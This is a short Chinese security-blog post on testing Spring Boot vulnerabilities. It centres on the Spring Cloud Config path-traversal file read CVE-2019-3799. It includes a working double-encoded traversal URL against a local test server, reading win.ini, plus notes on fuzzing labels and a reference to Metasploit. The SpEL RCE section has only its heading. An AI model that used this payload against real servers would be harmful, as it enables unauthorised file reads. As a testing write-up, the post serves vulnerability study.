微慑信息网

spring boot相关漏洞测试

1.spring cloud config 跨目录文件读取(CVE-2019-3799):

 

参考:

spring cloud config任意文件读取测试

测试环境下载:https://github.com/spring-cloud/spring-cloud-config/releases?after=v1.4.7.RELEASE

根据官方文档,可以通过如下请求GET /{name}/{profile}/{label}/{path} 来获取配置文件,name,profile和label的含义与常规环境下的endpoint相同,而path是指文件名。

 

http://127.0.0.1:8888/admin/env/master/..%252f..%252f..%252f..%252f..%252f..%252fWindows%252Fwin.ini

如果label不存在则会提示如下:

>No such label: env

或者:

Cannot load environment

 

fuzz出来lable:

test、master、head等

MSF测试:

 

参考https://www.xd10086.com/posts/1808713361549490810/

2、远程代码执行SpEL RCE

 

本文标题:spring boot相关漏洞测试
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2021/0506_11397.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » spring boot相关漏洞测试
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们